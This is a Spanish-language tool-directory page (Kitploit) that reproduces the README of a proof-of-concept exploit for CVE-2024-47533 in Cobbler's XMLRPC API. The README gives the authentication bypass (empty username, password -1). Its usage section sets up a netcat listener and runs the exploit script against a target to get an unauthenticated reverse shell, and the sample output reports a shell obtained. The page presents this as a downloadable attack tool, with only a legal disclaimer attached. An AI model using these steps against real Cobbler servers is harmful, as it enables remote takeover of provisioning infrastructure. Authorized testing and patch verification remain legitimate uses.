Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-47533-PoC — Prueba de concepto de explotación para CVE-2024-47533, una omisión de autenticación no autenticada en la API XMLRPC de Cobbler que conduce a la ejecución remota de código mediante una shell inversa inyectada. | Kitploit
Herramientas/GitHubGitHub/00xcanelo/cve-2024-47533-poc
Autenticación y AutorizaciónExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónRed Teaming
GitHub00xcanelo/cve-2024-47533-poc

CVE-2024-47533-PoC

Prueba de concepto de explotación para CVE-2024-47533, una omisión de autenticación no autenticada en la API XMLRPC de Cobbler que conduce a la ejecución remota de código mediante una shell inversa inyectada.

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
13hace 1 añoAún no revisado

CVE-2024-47533 – Omisión de Autenticación en XMLRPC de Cobbler → Reverse Shell (RCE sin Autenticación)

📌 Resumen

Este repositorio contiene un Exploit de Prueba de Concepto (PoC) para CVE-2024-47533,
una omisión crítica de autenticación en la API XMLRPC de Cobbler que conduce a ejecución remota de código (RCE) sin autenticación.

El exploit aprovecha la falla en el método login() de la API XMLRPC para eludir la autenticación e inyectar un comando de reverse shell a través de background_import().


⚠️ Aviso Legal

Esta herramienta está destinada únicamente a fines educativos, de investigación y pruebas de penetración autorizadas.
NO la utilice en sistemas que no sean de su propiedad o para los cuales no tenga permiso explícito por escrito.
El autor no asume ninguna responsabilidad por el mal uso o los daños causados.


🛠 Detalles Técnicos

  • Tipo de Vulnerabilidad: Omisión de Autenticación → RCE
  • Componente Afectado: API XMLRPC de Cobbler
  • Vector de Ataque: Red
  • Privilegios Requeridos: Ninguno
  • Interacción del Usuario: Ninguna

Causa Raíz:
utils.get_shared_secret() devuelve incorrectamente -1 debido a un mal manejo de la lectura de archivos en modo binario con una codificación, lo que permite la autenticación con un nombre de usuario vacío y -1 como contraseña.

Impacto:
Un atacante puede:

  • Obtener acceso a la API con nivel de administrador
  • Inyectar comandos arbitrarios del sistema en las plantillas de Cobbler
  • Lanzar una reverse shell en el objetivo

🚀 Uso

1️⃣ Clonar el repositorio

root@kitploit:~
git clone https://github.com/00xCanelo/CVE-2024-47533-PoC.git
cd CVE-2024-47533-PoC

2️⃣ Configurar un listener

En su máquina atacante:

root@kitploit:~
nc -lvnp 4444

3️⃣ Ejecutar el exploit

root@kitploit:~
python3 CVE-2024-47533.py -u http://<TARGET_IP>:<PORT>/RPC2 -l <LHOST> -p <LPORT>

Ejemplo:

root@kitploit:~
python3 CVE-2024-47533.py -u http://192.168.1.50:25151/RPC2 -l 192.168.1.100 -p 4444

📂 Estructura de Archivos

root@kitploit:~
.
├── CVE-2024-47533.py  # Script de exploit de reverse shell
└── README.md          # Documentación

📸 Salida de Ejemplo

root@kitploit:~
[*] Target: http://192.168.1.50:25151/RPC2
[*] Listener: 192.168.1.100:4444
[*] Payload: bash
[*] Conectando a Cobbler...
[*] Autenticando...
[*] Ejecutando exploit...
[+] ¡Exploit enviado! Shell obtenida 🔥.

🧑‍💻 Autor

00xCanelo
Perfil de GitHub


📚 Referencias

  • NVD: CVE-2024-47533
  • Proyecto Cobbler en GitHub
Descargar herramienta